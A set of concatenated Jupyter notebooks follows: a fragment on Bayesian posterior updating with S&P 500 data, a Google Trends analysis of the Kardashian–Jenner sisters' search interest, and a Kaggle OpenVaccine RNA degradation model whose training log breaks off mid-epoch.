np.linspace(0, 1, 100) # uniform (uninformative) prior a = b = 1 fig, axes = plt.subplots(nrows=3, ncols=3, figsize=(14, 7), sharex=True) axes = axes.flatten() fmt = FuncFormatter(lambda x, _: f'{x:.0%}') for i, trials in enumerate(n_trials): successes = outcomes[:trials] theta_mle = np.mean(successes) heads = sum(successes) tails = trials - heads update = stats.beta.pdf(p, a + heads , b + tails) theta_map = pd.Series(update, index=p).idxmax() axes[i] = format_plot(axes, i, p, update, trials=trials, success=heads, true_p=.5, tmle=theta_mle, tmap=theta_map) title = 'Bayesian Probabilities: Updating the Posterior' fig.suptitle(title, y=1.02, fontsize=14) fig.tight_layout() ###Output _____no_output_____ ###Markdown Stock Price Moves We will collect samples of different sizes of binarized daily S&P 500 returns where the positive outcome is a price increase. Starting from an uninformative prior that allocates equal probability to each possible success probability in the interval [0, 1], we compute the posterior for different evidence samples. ###Code sp500_returns = pd.read_hdf('../data/assets.h5', key='sp500/fred').loc['2010':, 'close'] sp500_binary = (sp500_returns.pct_change().dropna() > 0).astype(int) ###Output _____no_output_____ ###Markdown The following code sample shows that the update consists in simply adding the observed numbers of success and failure to the parameters of the prior distribution to obtain the posterior.The resulting posterior distributions are plotted below. They illustrate the evolution from a uniform prior that views all success probabilities as equally likely to an increasingly peaked distribution.After 500 samples, the probability is concentrated near the actual probability of a positive move at 54.7% from 2010 to 2017. It also shows the small differences between MLE and MAP estimates, where the latter tends to be pulled slightly towards the expected value of the uniform prior. ###Code n_days = [0, 1, 3, 5, 10, 25, 50, 100, 500] # random sample of trading days # outcomes = sp500_binary.sample(n_days[-1]) # initial 500 trading days outcomes = sp500_binary.iloc[:n_days[-1]] p = np.linspace(0, 1, 100) # uniform (uninformative) prior a = b = 1 fig, axes = plt.subplots(nrows=3, ncols=3, figsize=(14, 7), sharex=True) axes = axes.flatten() for i, days in enumerate(n_days): successes = outcomes.iloc[:days] theta_mle = successes.mean() up = successes.sum() down = days - up update = stats.beta.pdf(p, a + up , b + down) theta_map = pd.Series(update, index=p).idxmax() axes[i] = format_plot(axes, i, p, update, trials=days, success=up, true_p=sp500_binary.mean(), tmle=theta_mle, tmap=theta_map) title = 'Bayesian Probabilities: Updating the Posterior' fig.suptitle(title, y=1.02, fontsize=14) fig.tight_layout() ###Output _____no_output_____
_notebooks/2020-08-20-01-Up-and-Down-With-the-Kardashians.ipynb
###Markdown Up and Down With the Kardashians> While I'm not a fan nor a hater of the Kardashians and Jenners, the polarizing family intrigues me. Why? Their marketing prowess. Say what you will about them and what they stand for, they are great at the hype game. Everything they touch turns to content. In this Project, you will explore the data underneath the hype in the form of search interest data from Google Trends. You'll recreate the Google Trends plot to visualize their ups and downs over time, then make a few custom plots of your own. And you'll answer the big question - "is Kim even the most famous sister anymore?" This is the Result of Project "Up and Down With the Kardashians", via datacamp.- toc: true - badges: true- comments: true- author: Chanseok Kang- categories: [Python, Datacamp, Data_Science, Visualization]- image: images/kardashian_jenner_family_tree.png 1. The sisters and Google TrendsWhile I'm not a fan nor a hater of the Kardashians and Jenners, the polarizing family intrigues me. Why? Their marketing prowess. Say what you will about them and what they stand for, they are great at the hype game. Everything they touch turns to content.The sisters in particular over the past decade have been especially productive in this regard. Let's get some facts straight. I consider the "sisters" to be the following daughters of Kris Jenner. Three from her first marriage to lawyer Robert Kardashian:Kourtney Kardashian (daughter of Robert Kardashian, born in 1979)Kim Kardashian (daughter of Robert Kardashian, born in 1980)Khloé Kardashian (daughter of Robert Kardashian, born in 1984)And two from her second marriage to Olympic gold medal-winning decathlete, Caitlyn Jenner (formerly Bruce):Kendall Jenner (daughter of Caitlyn Jenner, born in 1995)Kylie Jenner (daughter of Caitlyn Jenner, born in 1997)This family tree can be confusing, but we aren't here to explain it. We're here to explore the data underneath the hype, and we'll do it using search interest data from Google Trends. We'll recreate the Google Trends plot to visualize their ups and downs over time, then make a few custom plots of our own. And we'll answer the big question: is Kim even the most famous sister anymore?First, let's load and inspect our Google Trends data, which was downloaded in CSV form. The query parameters: each of the sisters, worldwide search data, 2007 to present day. (2007 was the year Kim became "active" according to Wikipedia.) ###Code import matplotlib.pyplot as plt import pandas as pd plt.rcParams['figure.figsize'] = (10, 8) # Read in dataset trends = pd.read_csv('./dataset/trends_kj_sisters.csv') # Inspect data trends.head() ###Output _____no_output_____ ###Markdown 2. Better "kolumn" namesSo we have a column for each month since January 2007 and a column for the worldwide search interest for each of the sisters each month. By the way, Google defines the values of search interest as: Numbers represent search interest relative to the highest point on the chart for the given region and time. A value of 100 is the peak popularity for the term. A value of 50 means that the term is half as popular. A score of 0 means there was not enough data for this term.Okay, that's great Google, but you are not making this data easily analyzable for us. I see a few things. Let's do the column names first. A column named "Kim Kardashian: (Worldwide)" is not the most usable for coding purposes. Let's shorten those so we can access their values better. Might as well standardize all column formats, too. I like lowercase, short column names. ###Code # Make column names easier to work with trends.columns = ['month', 'kim', 'khloe', 'kourtney', 'kendall', 'kylie'] # Inspect data trends.head() ###Output _____no_output_____ ###Markdown 3. Pesky data typesThat's better. We don't need to scroll our eyes across the table to read the values anymore since it is much less wide. And seeing five columns that all start with the letter "k" … the aesthetics … we should call them "kolumns" now! (Bad joke.)The next thing I see that is going to be an issue is that "&lt;" sign. If "a score of 0 means there was not enough data for this term," "&lt;1" must mean it is between 0 and 1 and Google does not want to give us the fraction from google.trends.com for whatever reason. That's fine, but this "&lt;" sign means we won't be able to analyze or visualize our data right away because those column values aren't going to be represented as numbers in our data structure. Let's confirm that by inspecting our data types. ###Code # Inspect data types trends.info() ###Output <class 'pandas.core.frame.DataFrame'> RangeIndex: 147 entries, 0 to 146 Data columns (total 6 columns): # Column Non-Null Count Dtype --- ------ -------------- ----- 0 month 147 non-null object 1 kim 147 non-null int64 2 khloe 147 non-null object 3 kourtney 147 non-null object 4 kendall 147 non-null object 5 kylie 147 non-null int64 dtypes: int64(2), object(4) memory usage: 7.0+ KB ###Markdown 4. From object to integerYes, okay, the khloe, kourtney, and kendall columns aren't integers like the kim and kylie columns are. Again, because of the "&lt;" sign that indicates a search interest value between zero and one. Is this an early hint at the hierarchy of sister popularity? We'll see shortly. Before that, we'll need to remove that pesky "&lt;" sign. Then we can change the type of those columns to integer. ###Code # Loop through columns for column in trends.columns: # Only modify columns that have the "<" sign if "<" in trends[column].to_string(): # Remove "<" and convert dtype to integer trends[column] = trends[column].str.replace("<", "") trends[column] = pd.to_numeric(trends[column]) # Inspect data types and data trends.info() trends.head() ###Output <class 'pandas.core.frame.DataFrame'> RangeIndex: 147 entries, 0 to 146 Data columns (total 6 columns): # Column Non-Null Count Dtype --- ------ -------------- ----- 0 month 147 non-null object 1 kim 147 non-null int64 2 khloe 147 non-null int64 3 kourtney 147 non-null int64 4 kendall 147 non-null int64 5 kylie 147 non-null int64 dtypes: int64(5), object(1) memory usage: 7.0+ KB ###Markdown 5. From object to datetimeOkay, great, no more "&lt;" signs. All the sister columns are of integer type.Now let's convert our month column from type object to datetime to make our date data more accessible. ###Code # Convert month to type datetime trends['month'] = pd.to_datetime(trends['month']) # Inspect data types and data trends.info() trends.head() ###Output <class 'pandas.core.frame.DataFrame'> RangeIndex: 147 entries, 0 to 146 Data columns (total 6 columns): # Column Non-Null Count Dtype --- ------ -------------- ----- 0 month 147 non-null datetime64[ns] 1 kim 147 non-null int64 2 khloe 147 non-null int64 3 kourtney 147 non-null int64 4 kendall 147 non-null int64 5 kylie 147 non-null int64 dtypes: datetime64[ns](1), int64(5) memory usage: 7.0 KB ###Markdown 6. Set month as indexAnd finally, let's set the month column as our index to wrap our data cleaning. Having month as index rather than the zero-based row numbers will allow us to write shorter lines of code to create plots, where month will represent our x-axis. ###Code # Set month as DataFrame index trends = trends.set_index('month') # Inspect the data trends.head() ###Output _____no_output_____ ###Markdown 7. The early Kim hypeOkay! So our data is ready to plot. Because we cleaned our data, we only need one line of code (and just thirteen characters!) to remake the Google Trends chart, plus another line to make the plot show up in our notebook. ###Code # Plot search interest vs. month %matplotlib inline fig, ax = plt.subplots(figsize=(10, 8)) trends.plot(ax=ax); ###Output _____no_output_____ ###Markdown 8. Kylie's riseOh my! There is so much to make sense of here. Kim's sharp rise in 2007, with the beginning of Keeping Up with the Kardashians, among other things. There was no significant search interest for the other four sisters until mid-2009 when Kourtney and Khloé launched the reality television series, Kourtney and Khloé Take Miami. Then there was Kim's rise from famous to literally more famous than God in 2011. This Cosmopolitan article covers the timeline that includes the launch of music videos, fragrances, iPhone and Android games, another television series, joining Instagram, and more. Then there was Kim's ridiculous spike in December 2014: posing naked on the cover of Paper Magazine in a bid to break the internet will do that for you.A curious thing starts to happen after that bid as well. Let's zoom in… ###Code # Zoom in from January 2014 fig, ax = plt.subplots(figsize=(10, 8)) trends.loc['2014-01':'2019-03'].plot(ax=ax); ###Output _____no_output_____ ###Markdown 9. Smooth out the fluctuations with rolling meansIt looks like my suspicion may be true: Kim is not always the most searched Kardashian or Jenner sister. Since late-2016, at various months, Kylie overtakes Kim. Two big spikes where she smashed Kim's search interest: in September 2017 when it was reported that Kylie was expecting her first child with rapper Travis Scott and in February 2018 when she gave birth to her daughter, Stormi Webster. The continued success of Kylie Cosmetics has kept her in the news, not to mention making her the "The Youngest Self-Made Billionaire Ever" according to Forbes.These fluctuations are descriptive but do not really help us answer our question: is Kim even the most famous sister anymore? We can use rolling means to smooth out short-term fluctuations in time series data and highlight long-term trends. Let's make the window twelve months a.k.a. one year. ###Code # Smooth the data with rolling means fig, ax = plt.subplots(figsize=(10, 8)) trends.rolling(window=12).mean().plot(ax=ax); ###Output _____no_output_____ ###Markdown 10. Who's more famous? The Kardashians or the Jenners?Whoa, okay! So by this metric, Kim is still the most famous sister despite Kylie being close and nearly taking her crown. Honestly, the biggest takeaway from this whole exercise might be Kendall not showing up that much. It makes sense, though, despite her wildly successful modeling career. Some have called her "the only normal one in her family" as she tends to shy away from the more dramatic and controversial parts of the media limelight that generate oh so many clicks.Let's end this analysis with one last plot. In it, we will plot (pun!) the Kardashian sisters against the Jenner sisters to see which family line is more popular now. We will use average search interest to make things fair, i.e., total search interest divided by the number of sisters in the family line.The answer? Since 2015, it has been a toss-up. And in the future? With this family and their penchant for big events, who knows? ###Code # Average search interest for each family line trends['kardashian'] = trends[['kim', 'khloe', 'kourtney']].sum(axis=1) / 3 trends['jenner'] = trends[['kendall', 'kylie']].sum(axis=1) / 2 # Plot average family line search interest vs. month fig, ax = plt.subplots(figsize=(10, 8)) trends[['kardashian', 'jenner']].plot(ax=ax); ###Output _____no_output_____
Model backlog/Models/88-openvaccine-6xconv-bigru-aug-sampling-5-v2.ipynb
###Markdown Dependencies ###Code from openvaccine_scripts import * import warnings, json from sklearn.model_selection import KFold, StratifiedKFold, GroupKFold import tensorflow.keras.layers as L import tensorflow.keras.backend as K from tensorflow.keras import optimizers, losses, Model from tensorflow.keras.callbacks import EarlyStopping, ReduceLROnPlateau SEED = 0 seed_everything(SEED) warnings.filterwarnings('ignore') ###Output _____no_output_____ ###Markdown Model parameters ###Code config = { "BATCH_SIZE": 32, "EPOCHS": 70, "LEARNING_RATE": 1e-3, "ES_PATIENCE": 10, "N_FOLDS": 5, "N_USED_FOLDS": 5, "PB_SEQ_LEN": 107, "PV_SEQ_LEN": 130, } with open('config.json', 'w') as json_file: json.dump(json.loads(json.dumps(config)), json_file) config ###Output _____no_output_____ ###Markdown Load data ###Code database_base_path = '/kaggle/input/stanford-covid-vaccine/' train = pd.read_json(database_base_path + 'train.json', lines=True) test = pd.read_json(database_base_path + 'test.json', lines=True) print('Train samples: %d' % len(train)) display(train.head()) print(f'Test samples: {len(test)}') display(test.head()) ###Output Train samples: 2400 ###Markdown Data augmentation ###Code def aug_data(df): target_df = df.copy() new_df = aug_df[aug_df['id'].isin(target_df['id'])] del target_df['structure'] del target_df['predicted_loop_type'] new_df = new_df.merge(target_df, on=['id','sequence'], how='left') df['cnt'] = df['id'].map(new_df[['id','cnt']].set_index('id').to_dict()['cnt']) df['log_gamma'] = 100 df['score'] = 1.0 new_df['augmented'] = True df['augmented'] = False df = df.append(new_df[df.columns]) return df # Augmented data aug_df = pd.read_csv('/kaggle/input/augmented-data-for-stanford-covid-vaccine/48k_augment.csv') print(f'Augmented samples: {len(aug_df)}') display(aug_df.head()) print(f"Samples in train before augmentation: {len(train)}") # print(f"Samples in test before augmentation: {len(test)}") train = aug_data(train) train.drop('index', axis=1, inplace=True) train = train.reset_index() # test = aug_data(test) print(f"Samples in train after augmentation: {len(train)}") # print(f"Samples in test after augmentation: {len(test)}") print(f"Unique id in train: {len(train['id'].unique())}") print(f"Unique sequences in train: {len(train['sequence'].unique())}") print(f"Unique structure in train: {len(train['structure'].unique())}") print(f"Unique predicted_loop_type in train: {len(train['predicted_loop_type'].unique())}") # print(f"Unique sequences in test: {len(test['sequence'].unique())}") ###Output Augmented samples: 48401 ###Markdown Auxiliary functions ###Code def get_dataset(x, y=None, sample_weights=None, labeled=True, shuffled=True, repeated=False, batch_size=32, buffer_size=-1, seed=0): input_map = {'inputs_seq': x['sequence'], 'inputs_struct': x['structure'], 'inputs_loop': x['predicted_loop_type'], 'inputs_bpps_max': x['bpps_max'], 'inputs_bpps_sum': x['bpps_sum'], 'inputs_bpps_scaled': x['bpps_scaled']} if labeled: output_map = {'output_react': y['reactivity'], 'output_bg_ph': y['deg_Mg_pH10'], 'output_ph': y['deg_pH10'], 'output_mg_c': y['deg_Mg_50C'], 'output_c': y['deg_50C']} if sample_weights is not None: dataset = tf.data.Dataset.from_tensor_slices((input_map, output_map, sample_weights)) else: dataset = tf.data.Dataset.from_tensor_slices((input_map, output_map)) else: dataset = tf.data.Dataset.from_tensor_slices((input_map)) if repeated: dataset = dataset.repeat() if shuffled: dataset = dataset.shuffle(2048, seed=seed) dataset = dataset.batch(batch_size) dataset = dataset.prefetch(buffer_size) return dataset def get_dataset_sampling(x, y=None, sample_weights=None, labeled=True, shuffled=True, repeated=False, batch_size=32, buffer_size=-1, seed=0): input_map = {'inputs_seq': x['sequence'], 'inputs_struct': x['structure'], 'inputs_loop': x['predicted_loop_type'], 'inputs_bpps_max': x['bpps_max'], 'inputs_bpps_sum': x['bpps_sum'], 'inputs_bpps_scaled': x['bpps_scaled']} if labeled: output_map = {'output_react': y['reactivity'], 'output_bg_ph': y['deg_Mg_pH10'], 'output_ph': y['deg_pH10'], 'output_mg_c': y['deg_Mg_50C'], 'output_c': y['deg_50C']} if sample_weights is not None: dataset = tf.data.Dataset.from_tensor_slices((input_map, output_map, sample_weights)) else: dataset = tf.data.Dataset.from_tensor_slices((input_map, output_map)) else: dataset = tf.data.Dataset.from_tensor_slices((input_map)) if repeated: dataset = dataset.repeat() if shuffled: dataset = dataset.shuffle(2048, seed=seed) return dataset ###Output _____no_output_____ ###Markdown Pre-process ###Code # Add bpps as features train = add_bpps_features(train, database_base_path) test = add_bpps_features(test, database_base_path) feature_cols = ['sequence', 'structure', 'predicted_loop_type', 'bpps_max', 'bpps_sum', 'bpps_scaled'] pred_cols = ['reactivity', 'deg_Mg_pH10', 'deg_pH10', 'deg_Mg_50C', 'deg_50C'] encoder_list = [token2int_seq, token2int_struct, token2int_loop, None, None, None] public_test = test.query("seq_length == 107").copy() private_test = test.query("seq_length == 130").copy() x_test_public = get_features_dict(public_test, feature_cols, encoder_list, public_test.index) x_test_private = get_features_dict(private_test, feature_cols, encoder_list, private_test.index) # To use as stratified col train['signal_to_noise_int'] = train['signal_to_noise'].astype(int) ###Output _____no_output_____ ###Markdown Model ###Code def model_fn(hidden_dim=384, dropout=.5, pred_len=68, n_outputs=5): inputs_seq = L.Input(shape=(None, 1), name='inputs_seq') inputs_struct = L.Input(shape=(None, 1), name='inputs_struct') inputs_loop = L.Input(shape=(None, 1), name='inputs_loop') inputs_bpps_max = L.Input(shape=(None, 1), name='inputs_bpps_max') inputs_bpps_sum = L.Input(shape=(None, 1), name='inputs_bpps_sum') inputs_bpps_scaled = L.Input(shape=(None, 1), name='inputs_bpps_scaled') def _one_hot(x, num_classes): return K.squeeze(K.one_hot(K.cast(x, 'uint8'), num_classes=num_classes), axis=2) ohe_seq = L.Lambda(_one_hot, arguments={'num_classes': len(token2int_seq)}, input_shape=(None, 1))(inputs_seq) ohe_struct = L.Lambda(_one_hot, arguments={'num_classes': len(token2int_struct)}, input_shape=(None, 1))(inputs_struct) ohe_loop = L.Lambda(_one_hot, arguments={'num_classes': len(token2int_loop)}, input_shape=(None, 1))(inputs_loop) ### Encoder block # Conv block conv_seq = L.Conv1D(filters=64, kernel_size=3, padding='same')(ohe_seq) conv_struct = L.Conv1D(filters=64, kernel_size=3, padding='same')(ohe_struct) conv_loop = L.Conv1D(filters=64, kernel_size=3, padding='same')(ohe_loop) conv_bpps_max = L.Conv1D(filters=64, kernel_size=3, padding='same')(inputs_bpps_max) conv_bpps_sum = L.Conv1D(filters=64, kernel_size=3, padding='same')(inputs_bpps_sum) conv_bpps_scaled = L.Conv1D(filters=64, kernel_size=3, padding='same')(inputs_bpps_scaled) x_concat = L.concatenate([conv_seq, conv_struct, conv_loop, conv_bpps_max, conv_bpps_sum, conv_bpps_scaled], axis=-1, name='conv_concatenate') # Recurrent block encoder, encoder_state_f, encoder_state_b = L.Bidirectional(L.GRU(hidden_dim, dropout=dropout, return_sequences=True, return_state=True, kernel_initializer='orthogonal'), name='Encoder_RNN')(x_concat) ### Decoder block decoder = L.Bidirectional(L.GRU(hidden_dim, dropout=dropout, return_sequences=True, kernel_initializer='orthogonal'), name='Decoder')(encoder, initial_state=[encoder_state_f, encoder_state_b]) # Since we are only making predictions on the first part of each sequence, we have to truncate it decoder_truncated = decoder[:, :pred_len] output_react = L.Dense(1, name='output_react')(decoder_truncated) output_bg_ph = L.Dense(1, name='output_bg_ph')(decoder_truncated) output_ph = L.Dense(1, name='output_ph')(decoder_truncated) output_mg_c = L.Dense(1, name='output_mg_c')(decoder_truncated) output_c = L.Dense(1, name='output_c')(decoder_truncated) model = Model(inputs=[inputs_seq, inputs_struct, inputs_loop, inputs_bpps_max, inputs_bpps_sum, inputs_bpps_scaled], outputs=[output_react, output_bg_ph, output_ph, output_mg_c, output_c]) opt = optimizers.Adam(learning_rate=config['LEARNING_RATE']) model.compile(optimizer=opt, loss={'output_react': MCRMSE, 'output_bg_ph': MCRMSE, 'output_ph': MCRMSE, 'output_mg_c': MCRMSE, 'output_c': MCRMSE}, loss_weights={'output_react': 2., 'output_bg_ph': 2., 'output_ph': 1., 'output_mg_c': 2., 'output_c': 1.}) return model model = model_fn() model.summary() ###Output Model: "functional_1" __________________________________________________________________________________________________ Layer (type) Output Shape Param # Connected to ================================================================================================== inputs_seq (InputLayer) [(None, None, 1)] 0 __________________________________________________________________________________________________ inputs_struct (InputLayer) [(None, None, 1)] 0 __________________________________________________________________________________________________ inputs_loop (InputLayer) [(None, None, 1)] 0 __________________________________________________________________________________________________ lambda (Lambda) (None, None, 4) 0 inputs_seq[0][0] __________________________________________________________________________________________________ lambda_1 (Lambda) (None, None, 3) 0 inputs_struct[0][0] __________________________________________________________________________________________________ lambda_2 (Lambda) (None, None, 7) 0 inputs_loop[0][0] __________________________________________________________________________________________________ inputs_bpps_max (InputLayer) [(None, None, 1)] 0 __________________________________________________________________________________________________ inputs_bpps_sum (InputLayer) [(None, None, 1)] 0 __________________________________________________________________________________________________ inputs_bpps_scaled (InputLayer) [(None, None, 1)] 0 __________________________________________________________________________________________________ conv1d (Conv1D) (None, None, 64) 832 lambda[0][0] __________________________________________________________________________________________________ conv1d_1 (Conv1D) (None, None, 64) 640 lambda_1[0][0] __________________________________________________________________________________________________ conv1d_2 (Conv1D) (None, None, 64) 1408 lambda_2[0][0] __________________________________________________________________________________________________ conv1d_3 (Conv1D) (None, None, 64) 256 inputs_bpps_max[0][0] __________________________________________________________________________________________________ conv1d_4 (Conv1D) (None, None, 64) 256 inputs_bpps_sum[0][0] __________________________________________________________________________________________________ conv1d_5 (Conv1D) (None, None, 64) 256 inputs_bpps_scaled[0][0] __________________________________________________________________________________________________ conv_concatenate (Concatenate) (None, None, 384) 0 conv1d[0][0] conv1d_1[0][0] conv1d_2[0][0] conv1d_3[0][0] conv1d_4[0][0] conv1d_5[0][0] __________________________________________________________________________________________________ Encoder_RNN (Bidirectional) [(None, None, 768), 1774080 conv_concatenate[0][0] __________________________________________________________________________________________________ Decoder (Bidirectional) (None, None, 768) 2658816 Encoder_RNN[0][0] Encoder_RNN[0][1] Encoder_RNN[0][2] __________________________________________________________________________________________________ tf_op_layer_strided_slice (Tens [(None, None, 768)] 0 Decoder[0][0] __________________________________________________________________________________________________ output_react (Dense) (None, None, 1) 769 tf_op_layer_strided_slice[0][0] __________________________________________________________________________________________________ output_bg_ph (Dense) (None, None, 1) 769 tf_op_layer_strided_slice[0][0] __________________________________________________________________________________________________ output_ph (Dense) (None, None, 1) 769 tf_op_layer_strided_slice[0][0] __________________________________________________________________________________________________ output_mg_c (Dense) (None, None, 1) 769 tf_op_layer_strided_slice[0][0] __________________________________________________________________________________________________ output_c (Dense) (None, None, 1) 769 tf_op_layer_strided_slice[0][0] ================================================================================================== Total params: 4,440,389 Trainable params: 4,440,389 Non-trainable params: 0 __________________________________________________________________________________________________ ###Markdown Training ###Code AUTO = tf.data.experimental.AUTOTUNE skf = GroupKFold(n_splits=config['N_FOLDS']) history_list = [] oof = train[['id', 'SN_filter', 'signal_to_noise'] + pred_cols].copy() oof_preds = np.zeros((len(train), 68, len(pred_cols))) test_public_preds = np.zeros((len(public_test), config['PB_SEQ_LEN'], len(pred_cols))) test_private_preds = np.zeros((len(private_test), config['PV_SEQ_LEN'], len(pred_cols))) for fold,(train_idx, valid_idx) in enumerate(skf.split(train, train['signal_to_noise_int'], train['id'])): if fold >= config['N_USED_FOLDS']: break print(f'\nFOLD: {fold+1}') # Create clean and noisy datasets valid_clean_idxs = np.intersect1d(train[(train['SN_filter'] == 1) & (train['augmented'] == False)].index, valid_idx) ### Create datasets # x_train = get_features_dict(train, feature_cols, encoder_list, train_idx) # y_train = get_targets_dict(train, pred_cols, train_idx) # w_train = np.log(train.iloc[train_idx]['signal_to_noise'].values+1.2)+1 x_valid = get_features_dict(train, feature_cols, encoder_list, valid_clean_idxs) y_valid = get_targets_dict(train, pred_cols, valid_clean_idxs) w_valid = np.log(train.iloc[valid_clean_idxs]['signal_to_noise'].values+1.2)+1 # train_ds = get_dataset(x_train, y_train, w_train, labeled=True, shuffled=True, batch_size=config['BATCH_SIZE'], buffer_size=AUTO, seed=SEED) valid_ds = get_dataset(x_valid, y_valid, w_valid, labeled=True, shuffled=False, batch_size=config['BATCH_SIZE'], buffer_size=AUTO, seed=SEED) oof_ds = get_dataset(get_features_dict(train, feature_cols, encoder_list, valid_idx), labeled=False, shuffled=False, batch_size=config['BATCH_SIZE'], buffer_size=AUTO, seed=SEED) test_public_ds = get_dataset(x_test_public, labeled=False, shuffled=False, batch_size=config['BATCH_SIZE'], buffer_size=AUTO, seed=SEED) test_private_ds = get_dataset(x_test_private, labeled=False, shuffled=False, batch_size=config['BATCH_SIZE'], buffer_size=AUTO, seed=SEED) # Create clean and noisy datasets normal_idxs = np.intersect1d(train[train['augmented'] == False].index, train_idx) x_train_normal = get_features_dict(train, feature_cols, encoder_list, normal_idxs) y_train_normal = get_targets_dict(train, pred_cols, normal_idxs) w_train_normal = np.log(train.iloc[normal_idxs]['signal_to_noise'].values+1.2)+1 normal_ds = get_dataset_sampling(x_train_normal, y_train_normal, w_train_normal, labeled=True, shuffled=True, repeated=True, batch_size=config['BATCH_SIZE'], buffer_size=AUTO, seed=SEED) augmented_idxs = np.intersect1d(train[train['augmented'] == True].index, train_idx) x_train_augmented = get_features_dict(train, feature_cols, encoder_list, augmented_idxs) y_train_augmented = get_targets_dict(train, pred_cols, augmented_idxs) w_train_augmented = np.log(train.iloc[augmented_idxs]['signal_to_noise'].values+1.2)+1 augmented_ds = get_dataset_sampling(x_train_augmented, y_train_augmented, w_train_augmented, labeled=True, shuffled=True, repeated=True, batch_size=config['BATCH_SIZE'], buffer_size=AUTO, seed=SEED) # Resampled TF Dataset resampled_ds = tf.data.experimental.sample_from_datasets([normal_ds, augmented_ds], weights=[.5, .5]) resampled_ds = resampled_ds.batch(config['BATCH_SIZE']).prefetch(AUTO) ### Model K.clear_session() model = model_fn() model_path = f'model_{fold}.h5' es = EarlyStopping(monitor='val_loss', mode='min', patience=config['ES_PATIENCE'], restore_best_weights=True, verbose=1) rlrp = ReduceLROnPlateau(monitor='val_loss', mode='min', factor=0.1, patience=5, verbose=1) ### Train history = model.fit(resampled_ds, validation_data=valid_ds, callbacks=[es, rlrp], epochs=config['EPOCHS'], batch_size=config['BATCH_SIZE'], steps_per_epoch=int(len(normal_idxs)//(config['BATCH_SIZE']* .5)), verbose=2).history history_list.append(history) # Save last model weights model.save_weights(model_path) ### Inference oof_ds_preds = np.array(model.predict(oof_ds)).reshape((len(pred_cols), len(valid_idx), 68)).transpose((1, 2, 0)) oof_preds[valid_idx] = oof_ds_preds # Short sequence (public test) model = model_fn(pred_len=config['PB_SEQ_LEN']) model.load_weights(model_path) test_public_ds_preds = np.array(model.predict(test_public_ds)).reshape((len(pred_cols), len(public_test), config['PB_SEQ_LEN'])).transpose((1, 2, 0)) test_public_preds += test_public_ds_preds * (1 / config['N_USED_FOLDS']) # Long sequence (private test) model = model_fn(pred_len=config['PV_SEQ_LEN']) model.load_weights(model_path) test_private_ds_preds = np.array(model.predict(test_private_ds)).reshape((len(pred_cols), len(private_test), config['PV_SEQ_LEN'])).transpose((1, 2, 0)) test_private_preds += test_private_ds_preds * (1 / config['N_USED_FOLDS']) ###Output FOLD: 1 Epoch 1/70 120/120 - 9s - loss: 8.8397 - output_react_loss: 0.9259 - output_bg_ph_loss: 1.1574 - output_ph_loss: 1.3049 - output_mg_c_loss: 1.1250 - output_c_loss: 1.1182 - val_loss: 6.6835 - val_output_react_loss: 0.7664 - val_output_bg_ph_loss: 0.9430 - val_output_ph_loss: 0.8700 - val_output_mg_c_loss: 0.8241 - val_output_c_loss: 0.7464 Epoch 2/70 120/120 - 7s - loss: 7.6376 - output_react_loss: 0.8081 - output_bg_ph_loss: 0.9683 - output_ph_loss: 1.1501 - output_mg_c_loss: 0.9694 - output_c_loss: 0.9957 - val_loss: 6.0817 - val_output_react_loss: 0.6944 - val_output_bg_ph_loss: 0.8665 - val_output_ph_loss: 0.8055 - val_output_mg_c_loss: 0.7370 - val_output_c_loss: 0.6802 Epoch 3/70 120/120 - 7s - loss: 7.1648 - output_react_loss: 0.7737 - output_bg_ph_loss: 0.9002 - output_ph_loss: 1.1059 - output_mg_c_loss: 0.8889 - output_c_loss: 0.9332 - val_loss: 5.6689 - val_output_react_loss: 0.6572 - val_output_bg_ph_loss: 0.8071 - val_output_ph_loss: 0.7491 - val_output_mg_c_loss: 0.6815 - val_output_c_loss: 0.6283 Epoch 4/70 120/120 - 7s - loss: 6.6211 - output_react_loss: 0.7340 - output_bg_ph_loss: 0.8261 - output_ph_loss: 1.0016 - output_mg_c_loss: 0.8152 - output_c_loss: 0.8689 - val_loss: 5.4716 - val_output_react_loss: 0.6421 - val_output_bg_ph_loss: 0.7689 - val_output_ph_loss: 0.7378 - val_output_mg_c_loss: 0.6485 - val_output_c_loss: 0.6149 Epoch 5/70 120/120 - 7s - loss: 6.4536 - output_react_loss: 0.7158 - output_bg_ph_loss: 0.8024 - output_ph_loss: 0.9987 - output_mg_c_loss: 0.7880 - output_c_loss: 0.8425 - val_loss: 5.3014 - val_output_react_loss: 0.6178 - val_output_bg_ph_loss: 0.7454 - val_output_ph_loss: 0.7235 - val_output_mg_c_loss: 0.6300 - val_output_c_loss: 0.5915 Epoch 6/70 120/120 - 7s - loss: 6.1134 - output_react_loss: 0.6714 - output_bg_ph_loss: 0.7681 - output_ph_loss: 0.9380 - output_mg_c_loss: 0.7443 - output_c_loss: 0.8078 - val_loss: 5.1079 - val_output_react_loss: 0.5890 - val_output_bg_ph_loss: 0.7184 - val_output_ph_loss: 0.6878 - val_output_mg_c_loss: 0.6115 - val_output_c_loss: 0.5824 Epoch 7/70 120/120 - 7s - loss: 5.9865 - output_react_loss: 0.6653 - output_bg_ph_loss: 0.7482 - output_ph_loss: 0.9160 - output_mg_c_loss: 0.7237 - output_c_loss: 0.7961 - val_loss: 5.0390 - val_output_react_loss: 0.5902 - val_output_bg_ph_loss: 0.7151 - val_output_ph_loss: 0.6802 - val_output_mg_c_loss: 0.5866 - val_output_c_loss: 0.5750 Epoch 8/70 120/120 - 7s - loss: 5.8787 - output_react_loss: 0.6528 - output_bg_ph_loss: 0.7308 - output_ph_loss: 0.9134 - output_mg_c_loss: 0.7059 - output_c_loss: 0.7861 - val_loss: 4.9266 - val_output_react_loss: 0.5709 - val_output_bg_ph_loss: 0.7068 - val_output_ph_loss: 0.6618 - val_output_mg_c_loss: 0.5758 - val_output_c_loss: 0.5577 Epoch 9/70 120/120 - 7s - loss: 5.8656 - output_react_loss: 0.6562 - output_bg_ph_loss: 0.7181 - output_ph_loss: 0.9100 - output_mg_c_loss: 0.7022 - output_c_loss: 0.8025 - val_loss: 4.9422 - val_output_react_loss: 0.5764 - val_output_bg_ph_loss: 0.7020 - val_output_ph_loss: 0.6640 - val_output_mg_c_loss: 0.5782 - val_output_c_loss: 0.5650 Epoch 10/70 120/120 - 7s - loss: 5.7170 - output_react_loss: 0.6373 - output_bg_ph_loss: 0.7020 - output_ph_loss: 0.8879 - output_mg_c_loss: 0.6831 - output_c_loss: 0.7843 - val_loss: 4.8992 - val_output_react_loss: 0.5714 - val_output_bg_ph_loss: 0.6902 - val_output_ph_loss: 0.6615 - val_output_mg_c_loss: 0.5746 - val_output_c_loss: 0.5652 Epoch 11/70 120/120 - 7s - loss: 